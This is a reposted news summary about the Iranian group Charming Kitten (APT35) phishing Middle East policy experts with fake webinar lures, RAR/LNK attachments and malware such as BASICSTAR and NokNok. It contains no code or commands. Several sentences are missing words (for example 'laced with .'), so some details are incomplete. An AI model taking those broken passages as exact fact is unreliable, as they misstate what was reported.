Skip to content Skip to footer

Iranian Hackers Target Middle East Policy Experts

A new set of cyberattacks have been attributed to the Iranian-origin threat actor, Charming Kitten, also known as APT35, CharmingCypress, Mint Sandstorm, TA453, and Yellow Garuda. This group has been identified as having a history of carrying out social engineering campaigns that target a wide range of entities such as think tanks, NGOs, and journalists in the Middle East. The attacks are designed to harvest sensitive information using such as MischiefTut and MediaPl (aka EYEGLASS), which are capable of compromising a host and gathering data. The group has also been found to use backdoors such as PowerLess, BellaCiao, POWERSTAR (aka GorjolEcho), and NokNok to continue its cyber onslaught. The attacks observed between September and October 2023 involved Charming Kitten posing as Rasanah International Institute for Iranian Studies (IIIS) to initiate contact and build trust with targets.

The attacks are characterized by the use of compromised email accounts belonging to legitimate contacts and multiple threat-actor-controlled email accounts. These attackers use Multi-Persona Impersonation (MPI) to create a more convincing and legitimate-looking email. The emails include RAR archives containing LNK files that are used as a starting point to distribute . The messages urge prospective targets to join a fake webinar about topics that are of interest to them. One such multi-stage infection sequence has been observed to deploy BASICSTAR and KORKULOADER, a PowerShell downloader .

BASICSTAR is a Visual Basic (VBS) that is capable of gathering basic system information, remotely executing commands relayed from a command-and-control (C2) server, and downloading and displaying a decoy PDF file. The phishing attacks are also engineered to serve different backdoors depending on the machine's operating system. While victims are compromised with POWERLESS, Apple macOS victims are targeted with an infection chain culminating in NokNok via a functional VPN application that's laced with .

Volexity researchers Ankur Saini, Callum Roxan, Charlie Gardner, and Damien Cash have noted that the CharmingCypress threat actor employs unusual social-engineering tactics, such as engaging targets in prolonged conversations over email before sending links to malicious content. The researchers have also observed that only some other threat actors have consistently churned out as many campaigns as CharmingCypress, dedicating human operators to support their ongoing efforts.

This disclosure comes as Recorded Future uncovered IRGC's targeting of Western countries using a network of contracting companies that also specialize in exporting technologies for surveillance and offensive purposes to countries like Iraq, Syria, and Lebanon. The relationship between intelligence and military organizations and Iran-based contractors takes the form of various cyber centers that act as “firewalls” to conceal the sponsoring entity. One such contractor is Ayandeh Sazan Sepher Aria, which is suspected to be associated with Emennet Pasargad.

Want to read more? Check out the original article available at The Hacker News!

Read More

Leave a comment

Newsletter Signup

The Grid —
The Matrix Has Me
Big Bear Lake, CA 92315

01010011 01111001 01110011 01110100 01100101 01101101 00100000
01000110 01100001 01101001 01101100 01110101 01110010 01100101

Reveal your creation date or I will disassemble your code one operation at a time!Tron

Deitasoft © 2024. All Rights Reserved.